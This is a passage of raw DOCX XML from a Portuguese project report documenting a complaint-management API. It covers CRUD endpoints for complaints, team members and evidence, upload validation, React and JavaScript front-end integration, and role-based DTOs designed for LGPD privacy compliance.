      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.2 Requisito (b): CRUD funcional nos recursos principais</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O sistema tem três recursos com ciclo de vida completo. Todos foram exercitados contra a aplicação em execução, e o resultado está no Anexo D.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="78" w:name="crud-de-denúncia"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.2.1 CRUD de Denúncia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970"/>
        <w:gridCol w:w="660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e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/api/denuncias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Público. Devolve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  <w:r>
              <w:t xml:space="preserve">, protocolo e score calculado no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(lista)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/api/denuncias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Paginado, com filtros. DTO sem relato nem endereço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(item)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/api/denuncias/{id}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 de detalhe. Gera</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">CONSULTA_SENSIVEL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(público)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/api/denuncias/protocolo/{p}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 público, sem relato, para o cidadão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(total)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/api/denuncias/{id}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Idempotente. Gera</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">ALTERACAO_DADOS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(status)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/api/denuncias/{id}/status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Acrescenta evento à linha do tempo. Gera</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">ALTERACAO_STATUS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 (responsável)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/api/denuncias/{id}/responsavel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</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">ATRIBUICAO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/api/denuncias/{id}?motivo=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lógica com anonimização. Gera</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">EXCLUSAO</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A exclusão merece nota, porque foge do CRUD ingênuo: ela</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">não remove a linha</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Destrói o conteúdo sensível (relato, endereço e resumo da IA passam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 e preserva a existência do registro, com motivo e data. A seção 5.2.2 apresenta o conflito entre o direito de eliminação e o dever de rastreabilidade que essa escolha resolve.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="78"/>
    <w:bookmarkStart w:id="79" w:name="crud-de-equipe"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.2.2 CRUD de Equipe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564"/>
        <w:gridCol w:w="1782"/>
        <w:gridCol w:w="12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e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 e</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"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(lista)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(item)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/api/equipe/{id}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ou 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PUT /api/equipe/{id}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GESTOR,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/api/equipe/{id}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GESTOR, ADMIN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">É o recurso onde os cinco verbos aparecem na forma mais canônica, e por isso ele é o usado na demonstração do vídeo para mostrar o ciclo completo, incluindo o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que o perfil ATENDENTE recebe ao tentar cadastrar um membro.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Toda alteração aqui gera</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ALTERACAO_EQUIPE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">na trilha, porque mudar quem pode receber casos é uma decisão administrativa com consequência sobre o acesso a dado pessoal.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="79"/>
    <w:bookmarkStart w:id="80" w:name="crud-de-evidência"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.2.3 CRUD de Evidência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3102"/>
        <w:gridCol w:w="726"/>
        <w:gridCol w:w="31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 e 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Create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/api/denuncias/protocolo/{p}/evidencias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Público,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">multipart/form-data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(lista)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/api/denuncias/{id}/evidencias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metadados: nome, tipo, tamanho, hash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(binário)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/api/evidencias/{id}/arquivo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</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">CONSULTA_SENSIVEL</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">. Hash reconferido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/api/evidencias/{id}?motivo=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 e ADMIN. Gera</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">EXCLUSAO</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Não existe operação de atualização de evidência, e a ausência é deliberada. Substituir o conteúdo de um anexo mantendo o mesmo identificador destruiria o valor probatório do registro: o hash gravado deixaria de descrever o que foi recebido. Corrigir um envio indevido se faz removendo com motivo e enviando outro arquivo, o que deixa os dois eventos na trilha.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O fluxo de recebimento executa as validações em ordem deliberada, da mais barata para a mais cara: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Tamanho</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(5 MB), porque rejeitar cedo evita ler o arquivo inteiro.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Quantidade</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">por denúncia (10), uma consulta simples ao banco.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Assinatura do conteúdo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, que exige ler os primeiros bytes.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Gravação</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sob UUID, fora da pasta pública, com cálculo do SHA-256.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Inverter essa ordem faria o servidor gastar disco e CPU antes de descobrir que o arquivo seria recusado de qualquer forma.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Um detalhe de configuração sustenta esse desenho: o limite de upload do contêiner é</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">maior</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">que a regra de negócio,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">spring.servlet.multipart.max-file-size=6MB</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">contra os 5 MB do</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">EvidenciaService</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. A folga é deliberada. Se os dois valores fossem iguais, o Spring recusaria o arquivo antes de a aplicação vê-lo, e o cliente receberia a exceção crua do contêiner em vez da mensagem de 413 do</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GlobalExceptionHandler</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Com a folga, quem responde é sempre a regra de negócio, e o tratador de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">MaxUploadSizeExceededException</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">fica como rede de proteção para envios muito acima do teto.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="80"/>
    <w:bookmarkStart w:id="81" w:name="evidência-de-execução-do-crud"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.2.4 Evidência de execução do CRUD</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O Anexo D registra a bateria de verificação executada contra a aplicação em funcionamento, com 81 testes automatizados verdes e as verificações manuais de integração. Os pontos diretamente ligados ao CRUD:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1008"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">criação de denúncia pelo portal, com o protocolo devolvido pelo servidor aparecendo no Kanban do painel;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1008"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">alteração de status pelo Kanban, com o evento correspondente na linha do tempo do caso e o registro na trilha;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1008"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">atribuição de responsável, com registro;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1008"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">exclusão pelo GESTOR, com o campo de relato lido como vazio depois da operação;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1008"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">tentativa de exclusão pelo ATENDENTE, respondida com 403 e registrada;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1008"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">envio, listagem, download e remoção de evidência, com o download gerando</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">CONSULTA_SENSIVEL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8" w:name="Xf28f4b857bea025229aab3c517d88c3132f4a37"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.3 Requisito (c): integração da API ao front-end</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O enunciado pede a demonstração do consumo dos endpoints por meio da interface em React. O projeto atende a isso e vai além: são</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">duas</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">implementações de front-end conversando com a mesma API, o que torna a integração comparável e evidencia que o contrato é o mesmo para as duas.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="83" w:name="formulario-react.html-a-interface-react"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.3.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">formulario-react.html</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: a interface React</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Componente funcional com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, React 18 servido por CDN com Babel Standalone, sem etapa de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">build</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. A escolha não é preguiça de ferramenta: sem etapa de compilação, o projeto continua executável logo após descompactar o ZIP, que é uma exigência explícita da entrega.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resposta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API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/denuncias`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(dados)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429</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">) { </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/* limite de envios por origem */</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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resposta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erro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resposta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setErros</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(erro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detalhes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400 vira erro campo a campo, sob cada input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O tratamento do campo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">detalhes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">do erro 400 é o que fecha o ciclo entre as duas pontas: o Bean Validation do servidor decide o que é inválido, e a mensagem aparece embaixo do campo correspondente no React.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">A validação não está duplicada no cliente.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">O cliente exibe a decisão do servidor, o que elimina a classe de defeito em que as duas validações divergem e o usuário recebe uma mensagem que não corresponde ao motivo real da recusa.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O componente exercita, sozinho, cinco comportamentos da API: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772"/>
        <w:gridCol w:w="51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Comportamento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aparece na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 Created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e score devolvidos pelo servidor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  <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">campo a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Mensagem sob o campo inválido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Aviso de limite de envios por origem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Indisponibilidade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Oferta de registro local, sem perder o texto digitado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Fonte única da verdade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score exibido é o do</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">ScoreService</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, não um cálculo em JavaScript</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Os estados e municípios vêm da API pública do IBGE, com 35 unidades carregadas na montagem do componente, o que demonstra o consumo de uma API externa além da própria.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="83"/>
    <w:bookmarkStart w:id="84" w:name="X8eae5cf0bc24c28d6ad2c3b9bae1d9e3f3c04e4"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.3.2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: o portal e o painel em JavaScript</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O portal e o painel eram, até o fim desta fase, a aplicação da Fase 4: gravavam e liam do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. A API já alimentava as telas novas (fila, pilha, auditoria, estatística), mas o fluxo principal não passava por ela. O resultado era uma contradição dentro da</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">mesma tela</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: a aba de estatística descrevia 125 denúncias do banco enquanto o Kanban ao lado mostrava as que existiam naquele navegador.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A correção foi feita</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">hidratando, e não reescrevendo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. O módulo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sincronia.js</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">traz os dados da API para o mesmo lugar de onde as telas já liam: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pagina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conteudo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(paraTela)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denuncias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lista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'denuncias'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(lista))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 Kanban, o backlog e a tabela de status não foram tocados, e passaram a ver dados do banco. Menos código alterado significa menos regressão possível. O esforço concentrou-se nas quatro operações de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">escrita</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, que agora vão ao servidor antes de tocar a tela: registrar denúncia, mudar status, atribuir responsável e anexar evidência. O caminho inverso, gravar local e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sincronizar depois</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, produziria telas mostrando algo que o banco nunca aceitou.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Três defeitos apareceram nesse trabalho e valem registro, porque todos são do mesmo tipo: comportamentos que só se manifestam quando as camadas se encontram.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">A hidratação apagava campos que só existem no cliente.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Código de acompanhamento do anonimato graduado, mensagens do elo de mão dupla e nível de anonimato não têm coluna na API, e eram sobrescritos na primeira sincronização. A correção foi mesclar, preservando a lista</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SO_DO_CLIENTE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O painel mostrava 100 de 126 casos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, sendo 126 o total daquele momento: as 125 da carga mais uma criada no teste. O cliente pedia 500 itens por página; o servidor limita a 100 e não reclama. A correção foi paginar em laço até esgotar as páginas, com teto de proteção.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">A denúncia de emergência desaparecia.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">O fluxo de emergência gravava direto no armazenamento local e era eliminado na sincronização seguinte. Passou a usar</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Backend.criarDenuncia</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">quando há API.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Um detalhe do mapeamento merece explicação, porque à primeira vista parece defeito: os campos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">desc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endereco</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">chegam vazios na listagem. Não é omissão, é a decisão de privacidade da seção 3.3.3 aparecendo na interface. A listagem da API não devolve relato nem endereço; esse conteúdo só existe no detalhe, uma requisição por vez, e essa leitura é auditada.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="84"/>
    <w:bookmarkStart w:id="85" w:name="X9c8c5f03ca8fd145a1692dd77ebb067a36f5e4b"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.3.3 A mesma denúncia, três respostas diferentes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O ponto mais importante do desenho desta API não está nas rotas, está nos DTOs. Um mesmo registro é serializado de três formas, conforme quem pergunta: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74"/>
        <w:gridCol w:w="1518"/>
        <w:gridCol w:w="726"/>
        <w:gridCol w:w="31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Usado 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carrega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DenunciaPublicaResponse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por protocolo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relato, endereço, análise de IA, responsável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DenunciaResumoResponse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listagem e Kanban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relato e endereço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DenunciaDetalheResponse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 do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endereço, se o perfil não puder vê-lo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A listagem não trafega o relato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">de propósito</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Uma página de Kanban carrega dezenas de casos de uma vez, e não há justificativa para transportar o relato completo de todos eles apenas para desenhar retângulos numa tela. É a aplicação direta do princípio da necessidade da LGPD, que limita o tratamento</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ao mínimo necessário para a realização de suas finalidades, com abrangência dos dados pertinentes, proporcionais e não excessivos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(BRASIL, 2018a, art. 6.º, III), e a contramedida que a OWASP prescreve para</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">API3:2023</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, cuja causa-raiz é descrita como a falta de validação de autorização no nível da propriedade do objeto (OWASP, 2023).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A consequência é direta sobre a auditoria: se a listagem devolvesse o relato, a ação</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">CONSULTA_SENSIVEL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">seria teatro, porque bastaria abrir o Kanban para ler cem denúncias sem que uma linha fosse registrada.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DenunciaDetalheResponse</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ainda varia conforme o perfil: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DenunciaDetalheResponse </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">detalhe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Denuncia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podeVerIdentidade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DenunciaDetalheResponse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podeVerIdentidade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getEndereco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MascaraUtil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endereco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getEndereco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Um ATENDENTE recebe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">"[endereco protegido]"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">no lugar de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">"Rua Goias, 800"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Não é a interface que esconde: é o servidor que não envia.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="85"/>
    <w:bookmarkStart w:id="86" w:name="mapa-de-tela-para-endpoint"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.3.4 Mapa de tela para endpoint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234"/>
        <w:gridCol w:w="468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exercitados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Formulário (HTML e React)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/api/denuncias</w:t>
            </w:r>
            <w:r>
